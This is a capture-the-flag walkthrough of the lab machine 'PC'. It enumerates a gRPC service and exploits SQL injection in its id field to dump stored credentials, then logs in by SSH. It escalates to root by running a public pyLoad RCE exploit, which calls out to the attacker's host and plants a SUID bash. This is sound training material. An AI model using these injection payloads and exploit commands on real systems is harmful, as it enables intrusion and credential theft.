PC

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.102.185:22
Open 10.129.102.185:50051
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.102.185
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 17:25 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:25
Completed NSE at 17:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:25
Completed NSE at 17:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:25
Completed NSE at 17:25, 0.01s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:25
Completed Parallel DNS resolution of 1 host. at 17:25, 0.22s elapsed
DNS resolution of 1 IPs took 0.22s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:25
Scanning 10.129.102.185 [2 ports]
Discovered open port 50051/tcp on 10.129.102.185
Discovered open port 22/tcp on 10.129.102.185
Completed Connect Scan at 17:25, 0.09s elapsed (2 total ports)
Initiating Service scan at 17:26
Scanning 2 services on 10.129.102.185
Completed Service scan at 17:26, 6.34s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.102.185.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 5.18s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.01s elapsed
Nmap scan report for 10.129.102.185
Host is up, received user-set (0.087s latency).
Scanned at 2024-11-24 17:25:59 UTC for 12s

PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChKXbRHNGTarynUVI8hN9pa0L2IvoasvTgCN80atXySpKMerjyMlVhG9QrJr62jtGg4J39fqxW06LmUCWBa0IxGF0thl2JCw3zyCqq0y8+hHZk0S3Wk9IdNcvd2Idt7SBv7v7x+u/zuDEryDy8aiL1AoqU86YYyiZBl4d2J9HfrlhSBpwxInPjXTXcQHhLBU2a2NA4pDrE9TxVQNh75sq3+G9BdPDcwSx9Iz60oWlxiyLcoLxz7xNyBb3PiGT2lMDehJiWbKNEOb+JYp4jIs90QcDsZTXUh3thK4BDjYT+XMmUOvinEeDFmDpeLOH2M42Zob0LtqtpDhZC+dKQkYSLeVAov2dclhIpiG12IzUCgcf+8h8rgJLDdWjkw+flh3yYnQKiDYvVC+gwXZdFMay7Ht9ciTBVtDnXpWHVVBpv4C7efdGGDShWIVZCIsLboVC+zx1/RfiAI5/O7qJkJVOQgHH/2Y2xqD/PX4T6XOQz1wtBw1893ofX3DhVokvy+nM=
|   256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPqhx1OUw1d98irA5Ii8PbhDG3KVbt59Om5InU2cjGNLHATQoSJZtm9DvtKZ+NRXNuQY/rARHH3BnnkiCSyWWJc=
|   256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBG1KtV14ibJtSel8BP4JJntNT3hYMtFkmOgOVtyzX/R
50051/tcp open  grpc    syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.84 seconds

GRPC (50051)

The only port that's open on the box is 50051, which is default for GRPC servers.

grpcurl can be used to interact with the service.

└─$ grpcurl 10.129.102.185:50051 list
Failed to dial target host "10.129.102.185:50051": tls: first record does not look like a TLS handshake

└─$ grpcurl -plaintext 10.129.102.185:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection

└─$ grpcurl -plaintext 10.129.102.185:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection

┌──(woyag㉿kraken)-[~/Desktop/Rooms/PC]
└─$ grpcurl -plaintext 10.129.102.185:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo

└─$ grpcurl -plaintext 10.129.102.185:50051 describe SimpleApp
SimpleApp is a service:
service SimpleApp {
  rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
  rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
  rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
}

└─$ grpcurl -plaintext 10.129.102.185:50051 SimpleApp.getInfo
{
  "message": "Authorization Error.Missing 'token' header"
}

└─$ grpcurl -plaintext 10.129.102.185:50051 SimpleApp.RegisterUser
{
  "message": "username or password must be greater than 4"
}

└─$ grpcurl -plaintext -format text -d 'username: "test", password: "test"' 10.129.102.185:50051 SimpleApp.RegisterUser
message: "Account created for user test!"

└─$ grpcurl -plaintext -format text -d 'username: "test", password: "test"' 10.129.102.185:50051 SimpleApp.LoginUser
message: "Your id is 363."

└─$ grpcurl -plaintext -format text -H "token: 363" -d 'id: "363"' 10.129.102.185:50051 SimpleApp.getInfo
message: "Authorization Error.Missing 'token' header"

└─$ grpcurl -plaintext 10.129.102.185:50051 describe getInfoRequest
getInfoRequest is a message:
message getInfoRequest {
  string id = 1;
}

getInfoRequest is somewhat troublesome, we need a token but we are only given id...

If we supply -v (verbose) flag we should get more output and there's the token.

└─$ grpcurl -v -plaintext -format text -d 'username: "test", password: "test"' 10.129.102.185:50051 SimpleApp.LoginUser

Resolved method descriptor:
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );

Request metadata to send:
(empty)

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Response contents:
message: "Your id is 788."

Response trailers received:
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTczMjQ4MDE5MX0.jjvhshsuvPfw_izElK73Nk2oeoKk4EUM2OYyNFLsrrE'
Sent 1 request and received 1 response

└─$ grpcurl -plaintext -format text -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTczMjQ4MDE5MX0.jjvhshsuvPfw_izElK73Nk2oeoKk4EUM2OYyNFLsrrE" -d 'id: "788"' 10.129.102.185:50051 SimpleApp.getInfo
message: "Will update soon."

The only output getInfo returns is message: "Will update soon." and not much to go on..

The token died in few minutes so just automate the process, last url is somewhat dynamic so I left it as echo

#!/bin/bash

AUTH='username: "letmein", password: "letmein"'

resp=$(grpcurl -plaintext -format text -d "$AUTH" 10.129.102.185:50051 SimpleApp.RegisterUser)

resp=$(grpcurl -v -plaintext -format text -d "$AUTH" 10.129.102.185:50051 SimpleApp.LoginUser)
token=$(echo "$resp" | grep -oP "token: b'\K[^']+")
user_id=$(echo "$resp" | grep -oP 'message: "Your id is \K[0-9]+')

echo "grpcurl -plaintext -format text -H \"token: $token\" -d \"id: \\\"$user_id\\\"\" 10.129.102.185:50051 SimpleApp.getInfo"

SQLi is possible in the ID field

└─$ grpcurl -plaintext -format text -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibGV0bWVpbiIsImV4cCI6MTczMjQ4MzE2Mn0.1H4GsW4wtMBDcPOhJwrUK8vVtHluod2IHchLOvlHwAQ" -d "id: \"690 AND 1=1-- -\"" 10.129.102.185:50051 SimpleApp.getInfo
message: "Will update soon."

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md#sqlite-string

└─$ grpcurl -plaintext -format text -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibGV0bWVpbiIsImV4cCI6MTczMjQ4MzE2Mn0.1H4GsW4wtMBDcPOhJwrUK8vVtHluod2IHchLOvlHwAQ" -d "id: \"690 UNION SELECT GROUP_CONCAT(sql) FROM sqlite_master -- -\"" 10.129.102.185:50051 SimpleApp.getInfo
message: "CREATE TABLE \"accounts\" (\n\tusername TEXT UNIQUE,\n\tpassword TEXT\n),CREATE TABLE messages(id INT UNIQUE, username TEXT UNIQUE,message TEXT)"
└─$ grpcurl -plaintext -format text -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibGV0bWVpbiIsImV4cCI6MTczMjQ4MzE2Mn0.1H4GsW4wtMBDcPOhJwrUK8vVtHluod2IHchLOvlHwAQ" -d "id: \"690 UNION SELECT GROUP_CONCAT(username || ':' || password) FROM accounts -- -\"" 10.129.102.185:50051 SimpleApp.getInfo
message: "admin:admin,sau:HereIsYourPassWord1431"

SSH (22)

Creds: sau:HereIsYourPassWord1431

└─$ ssh sau@10.129.102.185
sau@pc:~$ id
uid=1001(sau) gid=1001(sau) groups=1001(sau)

User.txt

sau@pc:~$ cat user.txt
3f9955a40000644faa48435d39d1ce6a

Privilege Escalation

sau@pc:~$ ss -tunlp4
Netid                State                 Recv-Q                Send-Q                                Local Address:Port                                 Peer Address:Port                Process
udp                  UNCONN                0                     0                                     127.0.0.53%lo:53                                        0.0.0.0:*
udp                  UNCONN                0                     0                                           0.0.0.0:68                                        0.0.0.0:*
tcp                  LISTEN                0                     4096                                  127.0.0.53%lo:53                                        0.0.0.0:*
tcp                  LISTEN                0                     128                                         0.0.0.0:22                                        0.0.0.0:*
tcp                  LISTEN                0                     5                                         127.0.0.1:8000                                      0.0.0.0:*
tcp                  LISTEN                0                     128                                         0.0.0.0:9666                                      0.0.0.0:*
---
└─$ ssh sau@10.129.102.185 -L 8000:0:8000 -L 9666:0:9666

Some internal application called pyLoad is running on port 8000 as root.

sau@pc:~$ ps aux | grep py
root         807  0.0  0.4  29876 18320 ?        Ss   17:24   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         998  0.0  0.7 634704 30612 ?        Ssl  17:24   0:02 /usr/bin/python3 /opt/app/app.py
root        1004  0.0  1.9 1251296 77564 ?       Ssl  17:24   0:04 /usr/bin/python3 /usr/local/bin/pyload
sau         2066  0.0  0.0   8160   724 pts/0    S+   18:47   0:00 grep --color=auto py
Writeup.png

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

└─$ curl -LOs https://www.exploit-db.com/download/51532
└─$ py 51532.py -u http://localhost:8000 -c 'curl 10.10.14.42'
Writeup-1.png

Exploit works.

└─$ py 51532.py -u http://localhost:8000 -c 'install -m4777 /bin/bash /tmp/rootbash'
[+] Check if target host is alive: http://localhost:8000
[+] Host up, let's exploit!
[+] The exploit has be executeded in target machine.
sau@pc:/opt/app$ /tmp/rootbash -p
rootbash-5.0# id
uid=1001(sau) gid=1001(sau) euid=0(root) groups=1001(sau)

Root.txt

rootbash-5.0# cd /root
rootbash-5.0# cat root.txt
624b00dedbaac39c36bbc1d1208c6f87
PreviousOpenSourceNextPandora

Last updated